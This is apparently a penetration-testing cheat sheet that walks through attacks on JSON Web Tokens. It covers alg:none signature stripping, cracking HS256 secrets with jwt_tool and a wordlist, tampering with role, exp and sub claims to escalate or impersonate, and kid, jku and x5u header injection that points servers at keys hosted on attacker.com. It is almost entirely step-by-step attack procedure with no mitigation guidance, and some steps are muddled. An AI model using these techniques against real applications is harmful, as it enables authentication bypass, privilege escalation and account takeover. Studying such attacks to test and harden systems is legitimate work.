JWT - MindMap to Exploit All

 

JWT Attacks

├── Signature Bypass

   ├── alg: none

   ├── RS256 → HS256

   ├── weak HMAC secret

├── Claim Tampering

   ├── exp (expiry)

   ├── iat (issued at)

   ├── role/user escalation

   ├── audience (aud) abuse

├── Header Injection

   ├── kid header

   ├── jku / x5u remote key

├── Replay / Misuse

   ├── token replay

   ├── no revocation (no jti)

   ├── stored in URL / localStorage

├── Hybrid + OAuth

   ├── token phishing / reuse

   ├── login CSRF → JWT reuse

===================================================================

JWT – Key Points

• Full form: JSON Web Token

• Used for: Authentication & Authorization

• Why: Stateless, secure, easy to verify

---

🔧 Format (3 parts, dot-separated)

HEADER.PAYLOAD.SIGNATURE

Example:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.
eyJ1c2VyIjoiVmFydW4iLCJyb2xlIjoiYWRtaW4ifQ.
hMACsignatureHere

---

📦 Contents

• Header: Algo used (HS256, RS256)

• Payload: Claims (user, role, exp)

• Signature: Validates the token → detects tampering

---

📤 How it's used

• Sent via Authorization header or Cookie

• Server decodes → trusts info → no DB/session check needed

===================================================================

JWT Signature Bypass – 3 Core Techniques

✅ 1. alg: none Attack

Goal: Remove signature completely.

Steps:

1. Get a valid JWT

2. Decode it → Change header to:

   { "alg": "none" }
   

3. Modify payload (e.g. "role": "admin")

4. Remove signature → token = header.payload.

5. Send token as cookie or Bearer

6. 🔓 Access granted if server doesn't enforce alg.

---

✅ 2. HS256 with Known or Weak Secret

Goal: Sign your own token using known shared secret.

Steps:

1. Get any valid JWT

2. Decode → Create new payload with "role": "admin"

3. Re-sign with: "maybe public key, try to find in public available .js files or some locations."

   jwt encode --alg HS256 --secret "known_secret"
   

4. Send token → server validates signature

5. 🔓 Privilege escalation

---

✅ 3. Weak Secret (Brute-force)

Goal: Crack secret and re-sign forged token.

Steps:

1. Capture JWT using HS256

2. Use jwt_tool:

   jwt_tool.py <token> -C -d rockyou.txt
   

3. If cracked → build new payload with admin access

4. Re-sign using discovered secret

5. Send forged token → access granted

===================================================================

JWT Claim Tampering 

---

🧩 ✅ Pre-requisites (Must-Have for Exploitation)

Requirement	Why
🔓 Ability to forge or re-sign token	Needed to modify claims and still pass verification
✅ Signature bypass (e.g. alg:none, HS256 abuse)	Allows unsigned/forged tokens
✅ Known or cracked HS256 secret	So you can re-sign tampered tokens
❌ RS256 with enforced signature	Tampering NOT possible (you can't re-sign)

🔧 Targeted Claims

Claim	Impact
role / admin	Privilege escalation
exp	Bypass expiry, keep session alive
iat, nbf	Time-based logic abuse
aud, iss	Use token across services (audience confusion)
sub	Become another user (IDOR-style attack)

🔥 Exploitation Steps (For Any Claim)

Step-by-Step:

1. 🧠 Decode token (e.g. jwt.io)

2. ✍️ Modify claim(s):

   • "role": "user" → "admin"

   • "exp": 1620000000 → "exp": 1920000000"

3. 🔐 Re-sign token with:

   • Known HS256 secret

   • Or using alg:none if allowed

4. 🧪 Send forged token via:

   • Cookie: token=<your_token>

   • Header: Authorization: Bearer <your_token>

5. 🔓 Access bypassed functionality (admin panel, expired session, etc.)

---

💣 Real-World Examples

Claim	Exploit
role	Get admin access to dashboard
exp	Reuse token past logout
sub	Impersonate another user
aud	Use Google token in your own app

===================================================================

JWT Header Injection

---

🔐 1. kid Injection – Key ID Abuse

Goal: Trick server into using your key

Steps:

1. Generate RSA key pair (private & public)

2. Create JWT header with:

   { "alg": "RS256", "kid": "attacker-key" }
   

3. Sign token using your private key

4. Server loads attacker-key (if it's preloaded or accessible)

5. Token passes as valid → 🔓 access

Note: Requires app to load or trust keys by kid

---

🔐 2. jku Injection – Remote JWK Fetch

Goal: Point server to your malicious JWKS URL

Steps:

1. Create RSA key pair

2. Convert public key to JWK (modulus n + exponent e)

3. Host jwks.json:

   { "keys": [ { "kty": "RSA", "kid": "x", "n": "...", "e": "AQAB" } ] }
   

4. Craft JWT header:

   { "alg": "RS256", "jku": "https://attacker.com/jwks.json" }
   

5. Sign with private key

6. Server fetches your JWKS → uses your key → 🔓 token accepted

Note: No upload needed. Just public URL hosting.

---

🔐 3. x5u Injection – Remote Certificate Abuse

Goal: Inject a fake cert the server will trust

Steps:

1. Generate X.509 cert with RSA:

   openssl req -x509 -newkey rsa:2048 ...
   

2. Host cert.pem online (e.g. via Python server or GitHub Pages)

3. Create JWT header:

   { "alg": "RS256", "x5u": "https://attacker.com/cert.pem" }
   

4. Sign JWT with private key

5. Server fetches cert → extracts public key → 🔓 validates token

Note: Works even if jku is blocked. Often overlooked.

---

🔑 Key Summary Table

Header	Requires Upload?	Needs Hosted File?	Description
kid	✅ Maybe	❌ or 🟡 Sometimes	Selects key by ID
jku	❌	✅ JWK JSON	Fetch key set from URL
x5u	❌	✅ X.509 cert	Fetch cert from URL

📌 In all cases:

• You sign token with your private key

• You trick server into verifying it with your public key